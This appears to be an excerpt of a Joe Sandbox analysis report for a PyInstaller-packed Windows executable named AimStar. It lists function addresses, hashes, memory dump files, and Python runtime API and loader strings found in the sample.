Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction Fuzzy Hash: 9FD1FBA2E0CE4241EB289E2D905263DA3B9FB05B68F948135CE0D07795DF3DFA49C760

Function 00007FF710F49870 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction ID: 0b697b9b9b6b80ea2fc8d7200cfbf0b4fa29b5300f4811da5b9a03056e671c0e
Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction Fuzzy Hash: A4C17D762181E08BD28AEB29E4694BA73E1F78930DBD5406BEF87477C5C73CA514DB20

Function 00007FF710F52C80 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction ID: 36025730a522d687b946761f9f04805e89b74d17027d413f0144df3d3be993a5
Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction Fuzzy Hash: 17B1C136A0CB4186E7A49F29D05213CBBB8F706B68FA40235EB4D47395CF39E649C760

Function 00007FF710F5E5E0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction ID: 3c4306c30fb65dd91e7800f393f8035dc0da3cb4c6b236f58099a6a027741726
Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction Fuzzy Hash: 24812772A1CB8146D778DF19A042379BAA5FB597E4F808235DA9D43B85CE3CF208CB10

Function 00007FF710F66488 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
Instruction ID: 76367c8aace7628829d2f4ebf508f49b5b1b4509501022d29cfc3358fa14f9fa
Opcode Fuzzy Hash: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
Instruction Fuzzy Hash: 0F611B26E0C99246F724A928D05723DE698AF49370F984339D61E4B7D5DE7EFC08C720

Function 00007FF710F519B4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: 3fdce3bc7393a97dd09c100c1ce38e3fd043bbb032d34493680c5fbd23bdd387
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: E951A336A1DE5182E7259B29C041238B3B4FB85B78FA44231CA4D17794DB3EFA57C750

Function 00007FF710F521D4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 19143e90199daaa338e84854f4b7ac43159617cf57c54aaf9b252f27fdf5c355
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: FE51733AA1CA5182E7A49B29C04123877B4EB56B78F648331EE4D17794CB3AFA47C750

Function 00007FF710F51DC4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: c41dfb68bb37f21cf19a29f9e3499e7f174d670a14e49d2a254470b69c774e60
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 28519336A1CE5282E7249B29D042238B7B8FB49B78F644231DE4D07794CB3AFA57C750

Function 00007FF710F51BC0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 0de9dc5b21c31853807ce95869f83f68755bb0f9546fe7286073285f8e20069e
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 9E51CF32A1CE5186E7249B29C045278B7B8FB45B68FA44131CE4D077A4CF3AFA4BC750

Function 00007FF710F517B0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: bbcfdcf25627af6bda6ec4fd4195010a04f71a238e10181ce0e18f17046da331
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 3B51BF36A1CE5186E7349B28C05123CA7B9FB45B69FA45131CA4C17798CB3AFA4BC790

Function 00007FF710F51FD0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: c261c91390c5cd0b8691166b8256b828d0d3cc5a0713791878b75c30ad09d4cf
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 7651D63AA1DE5185E7649B28C04123DB7B4EB46B68F644231EA4C177E4CF3AFD46C790

Function 00007FF710F55DA0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 49a939b529e4c91213b65b0118dd3f92c1dd5b341e5fac5af29e9b1cc9086f8f
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 5D41A76280DE4A45E9659928092E6B8F6E89F63FB0DD85270DD99D73C2DD0C3B4FC121

Function 00007FF710F59F10 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction ID: b5940e066525674250a90417f75b3bf02bd4438720d3f197f13b8459a21235cf
Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction Fuzzy Hash: DC41F522718E5582EF04DF2AD915169B3A5FB49FE4B899032EE0D97B58DE3CE549C300

Function 00007FF710F58154 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
Instruction ID: 9b96fe54465062fc65404e4c5ce492e3c3758c4c592f37275653edc113b764b8
Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
Instruction Fuzzy Hash: DF31C432B1CF4281E754EB25644213EAAE8AB85BE0F944239EA4D63BD5DF3CE106C314

Function 00007FF710F695E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction ID: 3c59a81b614146e6e3b828353f6285ed6e0e8551ed91c31daa224bc5f54282f6
Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction Fuzzy Hash: 94F0687171C6558ADB989F69A40366977D4F7083D0F80C03AD58D83B24DA3CD065CF14

Function 00007FF710F4D37C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction ID: 471386c9c7a07b118ea6ca32529ab7ff9eb4688dbb17441ba9b6247c68a66c85
Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction Fuzzy Hash: BDA00235A0CC0ED1E645BF00E8A2435B378FB50324BC00071E40D812F0AF3CB448E321

Function 00007FF710F45820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45830
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45842
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45879
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4588B
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458A4
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458B6
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458CF
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458E1
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458FD
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4590F
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4592B
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4593D
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45959
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4596B
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45987
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45999
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F459B5
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F459C7

Strings

PySys_SetObject, xrefs: 00007FF710F45E85, 00007FF710F45EA7
PyMarshal_ReadObjectFromString, xrefs: 00007FF710F45C5D, 00007FF710F45C7F
PyObject_SetAttrString, xrefs: 00007FF710F45D71, 00007FF710F45D93
Py_PreInitialize, xrefs: 00007FF710F4594F, 00007FF710F45971
Py_DecodeLocale, xrefs: 00007FF710F4586F, 00007FF710F45891
PyUnicode_FromString, xrefs: 00007FF710F45F6B, 00007FF710F45F8D
PyImport_ExecCodeModule, xrefs: 00007FF710F45C01, 00007FF710F45C23
PyObject_GetAttrString, xrefs: 00007FF710F45D43, 00007FF710F45D65
PyEval_EvalCode, xrefs: 00007FF710F45BA5, 00007FF710F45BC7
PyModule_GetDict, xrefs: 00007FF710F45CB9, 00007FF710F45CDB
PyUnicode_AsUTF8, xrefs: 00007FF710F45EB3, 00007FF710F45ED5
PyErr_NormalizeException, xrefs: 00007FF710F45AED, 00007FF710F45B0F
PyErr_Occurred, xrefs: 00007FF710F45B1B, 00007FF710F45B3D
PyErr_Restore, xrefs: 00007FF710F45B77, 00007FF710F45B99
PyConfig_Read, xrefs: 00007FF710F459D9, 00007FF710F459FB
PyObject_CallFunction, xrefs: 00007FF710F45CE7, 00007FF710F45D09
PyConfig_SetWideStringList, xrefs: 00007FF710F45A63, 00007FF710F45A85
Py_Finalize, xrefs: 00007FF710F458C5, 00007FF710F458E7
PyConfig_SetBytesString, xrefs: 00007FF710F45A07, 00007FF710F45A29
PyConfig_InitIsolatedConfig, xrefs: 00007FF710F459AB, 00007FF710F459CD
PyErr_Fetch, xrefs: 00007FF710F45ABF, 00007FF710F45AE1
Py_IsInitialized, xrefs: 00007FF710F45921, 00007FF710F45943
PyUnicode_DecodeFSDefault, xrefs: 00007FF710F45F0F, 00007FF710F45F31
PyUnicode_Join, xrefs: 00007FF710F45F99, 00007FF710F45FBB
PyRun_SimpleStringFlags, xrefs: 00007FF710F45DFB, 00007FF710F45E1D
PyUnicode_Decode, xrefs: 00007FF710F45EE1, 00007FF710F45F03
PyImport_ImportModule, xrefs: 00007FF710F45C2F, 00007FF710F45C51
PyImport_AddModule, xrefs: 00007FF710F45BD3, 00007FF710F45BF5
PyObject_CallFunctionObjArgs, xrefs: 00007FF710F45D15, 00007FF710F45D37
PySys_GetObject, xrefs: 00007FF710F45E57, 00007FF710F45E79
PyConfig_Clear, xrefs: 00007FF710F4597D, 00007FF710F4599F
Py_ExitStatusException, xrefs: 00007FF710F4589A, 00007FF710F458BC
PyUnicode_FromFormat, xrefs: 00007FF710F45F3D, 00007FF710F45F5F
Py_InitializeFromConfig, xrefs: 00007FF710F458F3, 00007FF710F45915
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF710F45DCD, 00007FF710F45DEF
PyUnicode_Replace, xrefs: 00007FF710F45FC7, 00007FF710F45FE9
PyErr_Print, xrefs: 00007FF710F45B49, 00007FF710F45B6B
PyMem_RawFree, xrefs: 00007FF710F45C8B, 00007FF710F45CAD
PyStatus_Exception, xrefs: 00007FF710F45E29, 00007FF710F45E4B
PyConfig_SetString, xrefs: 00007FF710F45A35, 00007FF710F45A57
Py_DecRef, xrefs: 00007FF710F45826, 00007FF710F45848
PyObject_Str, xrefs: 00007FF710F45D9F, 00007FF710F45DC1
Failed to get address for %hs, xrefs: 00007FF710F45851
PyErr_Clear, xrefs: 00007FF710F45A91, 00007FF710F45AB3
GetProcAddress, xrefs: 00007FF710F45858

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 2f14c39f281cfab80866f9a7ba3ef68efb82656077ee610267cefe6c84663f76
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: 85229138E0DF4BA1FA14BB55A8166B5A7ACAF05B71BC45136C85E42761FF3CB18CC260

Function 00007FF710F481C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF710F49400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF710F445E4,00000000,00007FF710F41985), ref: 00007FF710F49439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF710F488A7,?,?,00000000,00007FF710F43CBB), ref: 00007FF710F4821C

Part of subcall function 00007FF710F42810: MessageBoxW.USER32 ref: 00007FF710F428EA

Strings

LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF710F4828D
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF710F48230
CreateDirectory, xrefs: 00007FF710F4836C
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF710F48363
\, xrefs: 00007FF710F48251
%.*s, xrefs: 00007FF710F482FC
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF710F482C9
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF710F481F3

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
